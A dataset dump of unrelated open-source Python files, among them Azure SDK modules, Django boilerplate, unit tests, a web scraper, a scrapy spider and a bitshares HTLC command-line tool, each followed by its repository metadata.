query_parameters['$top'] = self._serialize.query("top", _top, 'int', minimum=0)
if _filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", _filter, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.post(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('PolicyTrackedResourcesQueryResults', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.QueryFailure, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_query_results_for_resource.metadata = {'url': '/{resourceId}/providers/Microsoft.PolicyInsights/policyTrackedResources/{policyTrackedResourcesResource}/queryResults'} # type: ignore
| Azure/azure-sdk-for-python | sdk/policyinsights/azure-mgmt-policyinsights/azure/mgmt/policyinsights/aio/operations/_policy_tracked_resources_operations.py | Python | mit | 19,738 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-04-18 07:59
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('primus', '0006_auto_20160418_0959'),
]
operations = [
migrations.AlterField(
model_name='building',
name='modified',
field=models.DateTimeField(auto_now=True),
),
]
| sighill/shade_app | primus/migrations/0007_auto_20160418_0959.py | Python | mit | 457 |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "bikes_prediction.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| cheer021/BikesPrediction_DP | bikes_prediction/manage.py | Python | mit | 259 |
# -*- coding: utf-8 -*-
# Copyright (c) 2013–2015Molly White
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import codecs, logging, os, util
from tokenizer import Tokenizer
from tokenparser import Parser
from api import Document
def setup_logging():
logger=logging.getLogger("W2L")
logger.setLevel(logging.DEBUG)
console_formatter = logging.Formatter("%(asctime)s - %(levelname)s"
": %(message)s", datefmt="%I:%M:%S %p")
consolehandler = logging.StreamHandler()
consolehandler.setFormatter(console_formatter)
logger.addHandler(consolehandler)
return logger
if __name__ == "__main__":
logger = setup_logging()
doc = Document()
doc.organize()
if not os.path.exists(os.curdir + '/raw'):
logger.debug("Getting raw text files.")
doc.call()
if not os.path.exists(os.curdir + '/text'):
logger.debug("Parsing JSON to TXT.")
doc.json_to_text()
# Open and read files
tokenizer = Tokenizer()
progress = util.ProgressChecker()
parser = Parser(progress)
if not os.path.exists(os.curdir + '/latex'):
os.mkdir(os.curdir + '/latex')
if not os.path.exists(os.curdir + '/latex'):
os.mkdir(os.curdir + '/latex')
#folders = sorted(os.listdir(path=(os.curdir + '/text')), key=int)
folders = ['0', '1', '2', '3']
for folder in folders:
files = sorted(os.listdir(path=(os.curdir + '/text/' + folder)), key=lambda x: int(x[0]))
if folder == '3':
files = ['0.txt', '1.txt']
with codecs.open(os.curdir + '/latex/' + folder + '.tex', 'w+', 'utf-8') as outputfile:
last_open = os.curdir + '/latex/' + folder + '.tex'
for file in files:
logger.debug("Parsing " + folder + "/" + file + " to " + folder + ".tex.")
with codecs.open(os.curdir + '/text/' + folder + '/' + file, 'r', 'utf-8') as f:
data = f.read()
token_list = tokenizer.analyze(data)
parser.begin(outputfile)
parser.dispatch(token_list)
print("Total number of pages included in main pages: " + str(doc.num_pages))
progress.get_statistics()
# with codecs.open(last_open, 'a', 'utf-8') as outputfile:
# contributors = doc.attribute()
# parser.end_matter(contributors, outputfile)
logger.debug("Parsing complete.") | molly/Wikisource-to-LaTeX | core.py | Python | mit | 3,449 |
"""Testing for ORM"""
from unittest import TestCase
import nose
from nose.tools import eq_
from sets import Set
from mdcorpus.orm import *
class ORMTestCase(TestCase):
def setUp(self):
self.store = Store(create_database("sqlite:"))
self.store.execute(MovieTitlesMetadata.CREATE_SQL)
self.store.execute(MovieCharactersMetadata.CREATE_SQL)
self.store.execute(RawScriptUrl.CREATE_SQL)
self.store.execute(MovieConversation.CREATE_SQL)
self.store.execute(MovieLine.CREATE_SQL)
movie = self.store.add(MovieTitlesMetadata(0,
u"10 things i hate about you",
1999,
6.90,
62847))
bianca = self.store.add(MovieCharactersMetadata(0,
"BIANCA",
"f",
4))
bruce = self.store.add(MovieCharactersMetadata(1,
"BRUCE",
"?",
"?"))
cameron = self.store.add(MovieCharactersMetadata(2,
"CAMERON",
"m",
"3"))
url = self.store.add(RawScriptUrl("http://www.dailyscript.com/scripts/10Things.html"))
conversation = self.store.add(MovieConversation(0, 2, 0))
line194 = self.store.add(MovieLine(
194, "Can we make this quick? Roxanne Korrine and Andrew Barrett are having an incredibly horrendous public break- up on the quad. Again."))
line195 = self.store.add(MovieLine(
195, "Well, I thought we'd start with pronunciation, if that's okay with you."))
line196 = self.store.add(MovieLine(
196, "Not the hacking and gagging and spitting part. Please."))
line197 = self.store.add(MovieLine(
197, "Okay... then how 'bout we try out some French cuisine. Saturday? Night?"))
self.store.flush()
movie.characters.add(bianca)
movie.characters.add(bruce)
movie.characters.add(cameron)
url.movie = movie
line_id_list = [194, 195, 196, 197]
for (i, line_id) in enumerate(line_id_list):
line = self.store.find(MovieLine, MovieLine.id == line_id).one()
line.number = i + 1
conversation.lines.add(line)
self.store.commit()
def tearDown(self):
print "done"
class MovieTitlesMetadataTestCase(ORMTestCase):
@nose.with_setup(ORMTestCase.setUp, ORMTestCase.tearDown)
def test_url(self):
movie = self.store.find(MovieTitlesMetadata, MovieTitlesMetadata.id == 0).one()
eq_(movie.url(), "http://www.dailyscript.com/scripts/10Things.html")
class MovieCharactersMetadataTestCase(ORMTestCase):
@nose.with_setup(ORMTestCase.setUp, ORMTestCase.tearDown)
def test_gender(self):
bianca = self.store.find(MovieCharactersMetadata, MovieCharactersMetadata.id == 0).one()
bruce = self.store.find(MovieCharactersMetadata, MovieCharactersMetadata.id == 1).one()
cameron = self.store.find(MovieCharactersMetadata, MovieCharactersMetadata.id == 2).one()
eq_(bianca.gender(), "f")
eq_(bruce.gender(), "?")
eq_(cameron.gender(), "m")
class MovieConversationTestCase(ORMTestCase):
@nose.with_setup(ORMTestCase.setUp, ORMTestCase.tearDown)
def test_consistency(self):
conversation = self.store.find(MovieConversation, MovieConversation.id == 1).one()
eq_(conversation.first_character.movie.title, conversation.movie.title)
eq_(conversation.second_character.movie.title, conversation.movie.title)
@nose.with_setup(ORMTestCase.setUp, ORMTestCase.tearDown)
def test_line_list(self):
conversation = self.store.find(MovieConversation, MovieConversation.id == 1).one()
line_ids = [line.id for line in conversation.line_list()]
eq_(line_ids, [194, 195, 196, 197])
| sosuke-k/cornel-movie-dialogs-corpus-storm | mdcorpus/tests/test_orm.py | Python | mit | 4,351 |
from ddt import ddt, data
from django.test import TestCase
from six.moves import mock
from waldur_core.core import utils
from waldur_core.structure import tasks
from waldur_core.structure.tests import factories, models
class TestDetectVMCoordinatesTask(TestCase):
@mock.patch('requests.get')
def test_task_sets_coordinates(self, mock_request_get):
ip_address = "127.0.0.1"
expected_latitude = 20
expected_longitude = 20
instance = factories.TestNewInstanceFactory()
mock_request_get.return_value.ok = True
response = {"ip": ip_address, "latitude": expected_latitude, "longitude": expected_longitude}
mock_request_get.return_value.json.return_value = response
tasks.detect_vm_coordinates(utils.serialize_instance(instance))
instance.refresh_from_db()
self.assertEqual(instance.latitude, expected_latitude)
self.assertEqual(instance.longitude, expected_longitude)
@mock.patch('requests.get')
def test_task_does_not_set_coordinates_if_response_is_not_ok(self, mock_request_get):
instance = factories.TestNewInstanceFactory()
mock_request_get.return_value.ok = False
tasks.detect_vm_coordinates(utils.serialize_instance(instance))
instance.refresh_from_db()
self.assertIsNone(instance.latitude)
self.assertIsNone(instance.longitude)
@ddt
class ThrottleProvisionTaskTest(TestCase):
@data(
dict(size=tasks.ThrottleProvisionTask.DEFAULT_LIMIT + 1, retried=True),
dict(size=tasks.ThrottleProvisionTask.DEFAULT_LIMIT - 1, retried=False),
)
def test_if_limit_is_reached_provisioning_is_delayed(self, params):
link = factories.TestServiceProjectLinkFactory()
factories.TestNewInstanceFactory.create_batch(
size=params['size'],
state=models.TestNewInstance.States.CREATING,
service_project_link=link)
vm = factories.TestNewInstanceFactory(
state=models.TestNewInstance.States.CREATION_SCHEDULED,
service_project_link=link)
serialized_vm = utils.serialize_instance(vm)
mocked_retry = mock.Mock()
tasks.ThrottleProvisionTask.retry = mocked_retry
tasks.ThrottleProvisionTask().si(
serialized_vm,
'create',
state_transition='begin_starting').apply()
self.assertEqual(mocked_retry.called, params['retried'])
| opennode/nodeconductor | waldur_core/structure/tests/unittests/test_tasks.py | Python | mit | 2,443 |
#!/usr/bin/env python
# encoding: utf-8
"""
Make a grid of synths for a set of attenuations.
2015-04-30 - Created by Jonathan Sick
"""
import argparse
import numpy as np
from starfisher.pipeline import PipelineBase
from androcmd.planes import BasicPhatPlanes
from androcmd.phatpipeline import (
SolarZIsocs, SolarLockfile,
PhatGaussianDust, PhatCrowding)
from androcmd.phatpipeline import PhatCatalog
def main():
args = parse_args()
av_grid = np.arange(0., args.max_av, args.delta_av)
if args.av is not None:
av = float(args.av)
run_pipeline(brick=args.brick, av=av, run_fit=args.fit)
else:
for av in av_grid:
run_pipeline(brick=args.brick, av=av, run_fit=args.fit)
def parse_args():
parser = argparse.ArgumentParser(
description="Grid of synths for a set of Av")
parser.add_argument('brick', type=int)
parser.add_argument('--max-av', type=float, default=1.5)
parser.add_argument('--delta-av', type=float, default=0.1)
parser.add_argument('--fit', action='store_true', default=False)
parser.add_argument('--av', default=None)
return parser.parse_args()
def run_pipeline(brick=23, av=0., run_fit=False):
dataset = PhatCatalog(brick)
pipeline = Pipeline(root_dir="b{0:d}_{1:.2f}".format(brick, av),
young_av=av, old_av=av, av_sigma_ratio=0.25,
isoc_args=dict(isoc_kind='parsec_CAF09_v1.2S',
photsys_version='yang'))
print(pipeline)
print('av {0:.1f} done'.format(av))
if run_fit:
pipeline.fit('f475w_f160w', ['f475w_f160w'], dataset)
pipeline.fit('rgb', ['f475w_f814w_rgb'], dataset)
pipeline.fit('ms', ['f475w_f814w_ms'], dataset)
class Pipeline(BasicPhatPlanes, SolarZIsocs,
SolarLockfile, PhatGaussianDust, PhatCrowding, PipelineBase):
"""A pipeline for fitting PHAT bricks with solar metallicity isochrones."""
def __init__(self, **kwargs):
super(Pipeline, self).__init__(**kwargs)
if __name__ == '__main__':
main()
| jonathansick/androcmd | scripts/dust_grid.py | Python | mit | 2,095 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class ApplicationGatewayHttpListener(SubResource):
"""Http listener of an application gateway.
:param id: Resource ID.
:type id: str
:param frontend_ip_configuration: Frontend IP configuration resource of an
application gateway.
:type frontend_ip_configuration:
~azure.mgmt.network.v2017_09_01.models.SubResource
:param frontend_port: Frontend port resource of an application gateway.
:type frontend_port: ~azure.mgmt.network.v2017_09_01.models.SubResource
:param protocol: Protocol. Possible values include: 'Http', 'Https'
:type protocol: str or
~azure.mgmt.network.v2017_09_01.models.ApplicationGatewayProtocol
:param host_name: Host name of HTTP listener.
:type host_name: str
:param ssl_certificate: SSL certificate resource of an application
gateway.
:type ssl_certificate: ~azure.mgmt.network.v2017_09_01.models.SubResource
:param require_server_name_indication: Applicable only if protocol is
https. Enables SNI for multi-hosting.
:type require_server_name_indication: bool
:param provisioning_state: Provisioning state of the HTTP listener
resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
:type provisioning_state: str
:param name: Name of the resource that is unique within a resource group.
This name can be used to access the resource.
:type name: str
:param etag: A unique read-only string that changes whenever the resource
is updated.
:type etag: str
:param type: Type of the resource.
:type type: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'frontend_ip_configuration': {'key': 'properties.frontendIPConfiguration', 'type': 'SubResource'},
'frontend_port': {'key': 'properties.frontendPort', 'type': 'SubResource'},
'protocol': {'key': 'properties.protocol', 'type': 'str'},
'host_name': {'key': 'properties.hostName', 'type': 'str'},
'ssl_certificate': {'key': 'properties.sslCertificate', 'type': 'SubResource'},
'require_server_name_indication': {'key': 'properties.requireServerNameIndication', 'type': 'bool'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, *, id: str=None, frontend_ip_configuration=None, frontend_port=None, protocol=None, host_name: str=None, ssl_certificate=None, require_server_name_indication: bool=None, provisioning_state: str=None, name: str=None, etag: str=None, type: str=None, **kwargs) -> None:
super(ApplicationGatewayHttpListener, self).__init__(id=id, **kwargs)
self.frontend_ip_configuration = frontend_ip_configuration
self.frontend_port = frontend_port
self.protocol = protocol
self.host_name = host_name
self.ssl_certificate = ssl_certificate
self.require_server_name_indication = require_server_name_indication
self.provisioning_state = provisioning_state
self.name = name
self.etag = etag
self.type = type
| lmazuel/azure-sdk-for-python | azure-mgmt-network/azure/mgmt/network/v2017_09_01/models/application_gateway_http_listener_py3.py | Python | mit | 3,718 |
# -*- coding: utf-8 -*-
"""
@file
@brief Customer notebook exporters.
"""
import os
from textwrap import indent
from traitlets import default
from traitlets.config import Config
from jinja2 import DictLoader
from nbconvert.exporters import RSTExporter
from nbconvert.filters.pandoc import convert_pandoc
def convert_pandoc_rst(source, from_format, to_format, extra_args=None):
"""
Overwrites `convert_pandoc
<https://github.com/jupyter/nbconvert/blob/master/nbconvert/filters/pandoc.py>`_.
@param source string to convert
@param from_format from format
@param to_format to format
@param extra_args extra arguments
@return results
"""
return convert_pandoc(source, from_format, to_format, extra_args=None)
def process_raw_html(source, extra_args=None):
"""
Replaces the output of
`add_menu_notebook
<http://www.xavierdupre.fr/app/jyquickhelper/helpsphinx/jyquickhelper/
helper_in_notebook.html#jyquickhelper.helper_in_notebook.add_notebook_menu>`_
by:
::
.. contents::
:local:
"""
if source is None:
return source # pragma: no cover
if 'var update_menu = function() {' in source:
return "\n\n.. contents::\n :local:\n\n"
return "\n\n.. raw:: html\n\n" + indent(source, prefix=' ')
class UpgradedRSTExporter(RSTExporter):
"""
Exports :epkg:`rst` documents.
Overwrites `RSTExporter <https://github.com/jupyter/
nbconvert/blob/master/nbconvert/exporters/rst.py>`_.
* It replaces `convert_pandoc <https://github.com/jupyter/
nbconvert/blob/master/nbconvert/filters/pandoc.py>`_
by @see fn convert_pandoc_rst.
* It converts :epkg:`svg` into :epkg:`png` if possible,
see @see fn process_raw_html.
* It replaces some known :epkg:`javascript`. The output of function
`add_menu_notebook <http://www.xavierdupre.fr/app/jyquickhelper/helpsphinx/jyquickhelper/
helper_in_notebook.html#jyquickhelper.helper_in_notebook.add_notebook_menu>`_
is replaced by ``.. contents::``.
.. index:: notebook export, nbconvert
It extends the template
`rst.tpl <https://github.com/jupyter/nbconvert/blob/master/nbconvert/templates/rst.tpl>`_.
New template is `rst_modified.tpl <https://github.com/sdpython/pyquickhelper/blob/master/
src/pyquickhelper/helpgen/rst_modified.tpl>`_.
It follows the hints given at
`Programatically creating templates
<https://nbconvert.readthedocs.io/en/latest/
nbconvert_library.html#Programatically-creating-templates>`_.
:epkg:`jyquickhelper` should add a string highly recognizable when adding a menu.
"""
def __init__(self, *args, **kwargs):
"""
Overwrites the extra loaders to get the right template.
"""
filename = os.path.join(os.path.dirname(__file__), 'rst_modified.tpl')
with open(filename, 'r', encoding='utf-8') as f:
content = f.read()
filename = os.path.join(os.path.dirname(__file__), 'rst.tpl')
with open(filename, 'r', encoding='utf-8') as f:
content2 = f.read()
dl = DictLoader({'rst_modified.tpl': content, 'rst.tpl': content2})
kwargs['extra_loaders'] = [dl]
RSTExporter.__init__(self, *args, **kwargs)
def default_filters(self):
"""
Overrides in subclasses to provide extra filters.
This should return an iterable of 2-tuples: (name, class-or-function).
You should call the method on the parent class and include the filters
it provides.
If a name is repeated, the last filter provided wins. Filters from
user-supplied config win over filters provided by classes.
"""
for k, v in RSTExporter.default_filters(self):
yield (k, v)
yield ('convert_pandoc_rst', convert_pandoc_rst)
yield ('process_raw_html', process_raw_html)
output_mimetype = 'text/restructuredtext'
export_from_notebook = "reST"
@default('template_file')
def _template_file_default(self):
return "rst_modified.tpl"
@default('file_extension')
def _file_extension_default(self):
return '.rst'
@default('template_name')
def _template_name_default(self):
return 'rst'
@property
def default_config(self):
c = Config({
'ExtractOutputPreprocessor': {
'enabled': True,
'output_filename_template': '{unique_key}_{cell_index}_{index}{extension}'
},
'HighlightMagicsPreprocessor': {
'enabled': True
},
})
c.merge(super(UpgradedRSTExporter, self).default_config)
return c
| sdpython/pyquickhelper | src/pyquickhelper/helpgen/notebook_exporter.py | Python | mit | 4,770 |
# -*- coding: utf-8 -*-
import scrapy
from locations.items import GeojsonPointItem
DAYS = [
'Mo',
'Tu',
'We',
'Th',
'Fr',
'Sa',
'Su'
]
class SparNoSpider(scrapy.Spider):
name = "spar_no"
allowed_domains = ["spar.no"]
start_urls = (
'https://spar.no/Finn-butikk/',
)
def parse(self, response):
shops = response.xpath('//div[@id="js_subnav"]//li[@class="level-1"]/a/@href')
for shop in shops:
yield scrapy.Request(
response.urljoin(shop.extract()),
callback=self.parse_shop
)
def parse_shop(self, response):
props = {}
ref = response.xpath('//h1[@itemprop="name"]/text()').extract_first()
if ref: # some links redirects back to list page
props['ref'] = ref.strip("\n").strip()
else:
return
days = response.xpath('//div[@itemprop="openingHoursSpecification"]')
if days:
for day in days:
day_list = day.xpath('.//link[@itemprop="dayOfWeek"]/@href').extract()
first = 0
last = 0
for d in day_list:
st = d.replace('https://purl.org/goodrelations/v1#', '')[:2]
first = DAYS.index(st) if first>DAYS.index(st) else first
last = DAYS.index(st) if first>DAYS.index(st) else first
props['opening_hours'] = DAYS[first]+'-'+DAYS[last]+' '+day.xpath('.//meta[@itemprop="opens"]/@content').extract_first()+' '+day.xpath('.//meta[@itemprop="closes"]/@content').extract_first()
phone = response.xpath('//a[@itemprop="telephone"]/text()').extract_first()
if phone:
props['phone'] = phone
addr_full = response.xpath('//div[@itemprop="streetAddress"]/text()').extract_first()
if addr_full:
props['addr_full'] = addr_full
postcode = response.xpath('//span[@itemprop="postalCode"]/text()').extract_first()
if postcode:
props['postcode'] = postcode
city = response.xpath('//span[@itemprop="addressLocality"]/text()').extract_first()
if city:
props['city'] = city.strip()
props['country'] = 'NO'
lat = response.xpath('//meta[@itemprop="latitude"]/@content').extract_first()
lon = response.xpath('//meta[@itemprop="longitude"]/@content').extract_first()
if lat and lon:
props['lat'] = float(lat)
props['lon'] = float(lon)
props['website'] = response.url
yield GeojsonPointItem(**props)
| iandees/all-the-places | locations/spiders/spar_no.py | Python | mit | 2,746 |
"""
Controller for voting related requests.
"""
import webapp2
from models.vote import VoteHandler
from models.vote_.cast_ballot import BallotHandler
from models.vote_.view_results import ResultsHandler
app = webapp2.WSGIApplication([
('/vote', VoteHandler),
('/vote/cast-ballot', BallotHandler),
('/vote/view-results', ResultsHandler)
], debug=True) | rice-apps/rice-elections | src/controllers/vote.py | Python | mit | 365 |
from galaxy.test.base.twilltestcase import TwillTestCase
#from twilltestcase import TwillTestCase
class EncodeTests(TwillTestCase):
def test_00_first(self): # will run first due to its name
"""3B_GetEncodeData: Clearing history"""
self.clear_history()
def test_10_Encode_Data(self):
"""3B_GetEncodeData: Getting encode data"""
self.run_tool('encode_import_chromatin_and_chromosomes1', hg17=['cc.EarlyRepSeg.20051216.bed'] )
# hg17=[ "cc.EarlyRepSeg.20051216.bed", "cc.EarlyRepSeg.20051216.gencode_partitioned.bed", "cc.LateRepSeg.20051216.bed", "cc.LateRepSeg.20051216.gencode_partitioned.bed", "cc.MidRepSeg.20051216.bed", "cc.MidRepSeg.20051216.gencode_partitioned.bed" ] )
self.wait()
self.check_data('cc.EarlyRepSeg.20051216.bed', hid=1)
# self.check_data('cc.EarlyRepSeg.20051216.gencode_partitioned.bed', hid=2)
# self.check_data('cc.LateRepSeg.20051216.bed', hid=3)
# self.check_data('cc.LateRepSeg.20051216.gencode_partitioned.bed', hid=4)
# self.check_data('cc.MidRepSeg.20051216.bed', hid=5)
# self.check_data('cc.MidRepSeg.20051216.gencode_partitioned.bed', hid=6)
| jmchilton/galaxy-central | galaxy/test/functional/test_3B_GetEncodeData.py | Python | mit | 1,185 |
import click
from bitshares.amount import Amount
from .decorators import online, unlock
from .main import main, config
from .ui import print_tx
@main.group()
def htlc():
pass
@htlc.command()
@click.argument("to")
@click.argument("amount")
@click.argument("symbol")
@click.option(
"--type", type=click.Choice(["ripemd160", "sha1", "sha256", "hash160"]),
default="sha256", prompt="Hash algorithm", show_default=True,
help="Hash algorithm"
)
@click.option(
"--hash", prompt="Hash (hex string)", hide_input=False, confirmation_prompt=True,
help="Hash value as string of hex digits"
)
@click.option(
"--expiration", default=60 * 60, prompt="Expiration (seconds)",
help="Duration of HTLC in seconds"
)
@click.option(
"--length", help="Length of PREIMAGE (not of hash). Generally OK " +
"to leave this as 0 for unconstrained.", default=0, show_default=True
)
@click.option("--account")
@click.pass_context
@online
@unlock
def create(ctx, to, amount, symbol, type, hash, expiration, length, account):
""" Create an HTLC contract from a hash and lock-time
"""
ctx.blockchain.blocking = True
tx = ctx.blockchain.htlc_create(
Amount(amount, symbol),
to,
hash_type=type,
hash_hex=hash,
expiration=expiration,
account=account,
preimage_length=length
)
tx.pop("trx", None)
print_tx(tx)
results = tx.get("operation_results", {})
if results:
htlc_id = results[0][1]
print("Your htlc_id is: {}".format(htlc_id))
@htlc.command()
@click.argument("to")
@click.argument("amount")
@click.argument("symbol")
@click.option(
"--type", type=click.Choice(["ripemd160", "sha1", "sha256", "hash160"]),
default="sha256", prompt="Hash algorithm", show_default=True,
help="Hash algorithm"
)
@click.option(
"--secret", prompt="Redeem Password", hide_input=True, confirmation_prompt=True,
help="Ascii-text preimage"
)
@click.option("--expiration", default=60 * 60, prompt="Expiration (seconds)",
help="Duration of HTLC in seconds"
)
@click.option(
"--length", help="Length of PREIMAGE (not of hash). Generally OK " +
"to leave this as 0 for unrestricted. If non-zero, must match length " +
"of provided preimage", default=0, show_default=True
)
@click.option("--account")
@click.pass_context
@online
@unlock
def create_from_secret(ctx, to, amount, symbol, type, secret, expiration,
length, account):
"""Create an HTLC contract from a secret preimage
If you are the party choosing the preimage, this version of
htlc_create will compute the hash for you from the supplied
preimage, and create the HTLC with the resulting hash.
"""
if length != 0 and length != len(secret):
raise ValueError("Length must be zero or agree with actual preimage length")
ctx.blockchain.blocking = True
tx = ctx.blockchain.htlc_create(
Amount(amount, symbol),
to,
preimage=secret,
preimage_length=length,
hash_type=type,
expiration=expiration,
account=account,
)
tx.pop("trx", None)
print_tx(tx)
results = tx.get("operation_results", {})
if results:
htlc_id = results[0][1]
print("Your htlc_id is: {}".format(htlc_id))
@htlc.command()
@click.argument("htlc_id")
@click.option(
"--secret", prompt="Redeem Password", hide_input=False, confirmation_prompt=False,
type=str, help="The preimage, as ascii-text, unless --hex is passed"
)
@click.option(
"--hex", is_flag=True, help="Interpret preimage as hex-encoded bytes"
)
@click.option("--account")
@click.pass_context
@online
@unlock
def redeem(ctx, htlc_id, secret, hex, account):
""" Redeem an HTLC contract by providing preimage
"""
encoding = "hex" if hex else "utf-8"
print_tx(ctx.blockchain.htlc_redeem(htlc_id, secret, encoding=encoding,
account=account)
)
| xeroc/uptick | uptick/htlc.py | Python | mit | 3,974 |
import os.path
import requests
import time
from bs4 import BeautifulSoup
from geotext import GeoText as gt
from string import punctuation
from collections import Counter
import re
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
threats = ['loss', 'fragmentation', 'hunting', 'poaching', 'fishing', 'overfishing', 'environmental', 'environment', 'invasive', 'disease', 'pet', 'pollution']
conservation = ['cites', 'protection law', 'captive breeding', 'protected', 'endangered species act', 'wwf', 'wcs']
conservationString = ''
threatString = ''
def findConservation(string):
consFound = []
string = string.lower()
string = string.replace("<p>", "")
global conservation
for word in conservation:
if word in string:
consFound.append(word)
return consFound
def findThreats(string):
threatsFound = []
string = string.lower()
string = string.replace("<p>", "")
global threats
for word in threats:
if word in string:
threatsFound.append(word)
index = string.index(word)
return threatsFound
def parseThrough(string):
string = string.replace(',','')
s = '<p>'
if s in string:
string = string.split(s)[1]
s = '</p>'
if s in string:
string = string.split(s)[0]
return string
def urlNeeded():
global threats
global conservationString
global threatString
allThreats = []
global conservation
allCons = []
f = open('output.txt', "w")
f.write('Scientific Name, Nickname, Common Name, Kingdom, Phylum, Class, Order, Family, Genus, Size, Threats, Conservation, Threat Keywords, Conservation Keywords, status, countries, country_count' + '\n')
with open('test.txt', "rb") as fd:
for line in fd:
line = line.lstrip().rstrip()
url = line
r = requests.get(url)
soup = BeautifulSoup(r.text.encode('utf-8'), 'html.parser')
newName = soup.find('td').text
newName = newName.lstrip().rstrip()
newName = str(newName)
newName = newName.replace(',',';')
f.write(newName + ',')
for t in soup.findAll('h1'):
name = t.text
s = '('
if s in name:
commonName = name.split(s)[0]
scienceName = name.split(s)[1]
scienceName = scienceName.replace(')','')
f.write(scienceName + ',')
print scienceName
f.write(name + ',')
soupsup = soup.findAll('td', align="left")
for node in soupsup:
waant = ''.join(node.findAll(text=True))
waant = str(waant)
waant = waant.replace('\n', '')
f.write(waant + ',')
if "(" in node:
break
items = []
for t in soup.findAll('td'):
items.append(t.text)
check = 9
badge = len(items)
if badge > 6:
f.write(items[badge - 1] + ',')
else:
f.write(',')
badges = soup.findAll("p", class_="Threats")
ofInterest = str(badges)
foundThreats = findThreats(ofInterest)
ofInterest = parseThrough(ofInterest)
threatString = threatString + ofInterest
if ofInterest:
f.write(ofInterest)
f.write(',')
else:
f.write(' ,')
badges = soup.findAll("p", class_="Conservation")
ofInterest = str(badges)
foundCons = findConservation(ofInterest)
ofInterest = parseThrough(ofInterest)
conservationString = conservationString + ofInterest
badges = soup.findAll("p", class_="Range")
badges = str(badges)
countries = gt(badges).country_mentions
countries = str(countries)
#countries = re.sub('[^A-Z]', '', s)
countries = countries.replace(',', '')
cCount = sum(c.isdigit() for c in countries)
cCount = str(cCount)
print cCount
status = soup.findAll("p", class_="Status")
status = str(status)
if 'Critically' in status:
status = 'Critically Endangered'
else:
status = 'Endangered'
if ofInterest:
f.write(ofInterest)
f.write(' ,' + '')
else:
f.write(' ,')
for node in foundThreats:
f.write(node)
f.write(';')
f.write(' ,')
for node in foundCons:
f.write(node)
f.write(';')
f.write(' ,')
f.write(status)
f.write(',')
f.write(countries)
f.write(',')
f.write(cCount)
f.write('\n')
fd.close()
f.close()
def main():
urlNeeded()
main() | andrewedstrom/cs638project | arkive table analysis/parse.py | Python | mit | 5,243 |
Subsets and Splits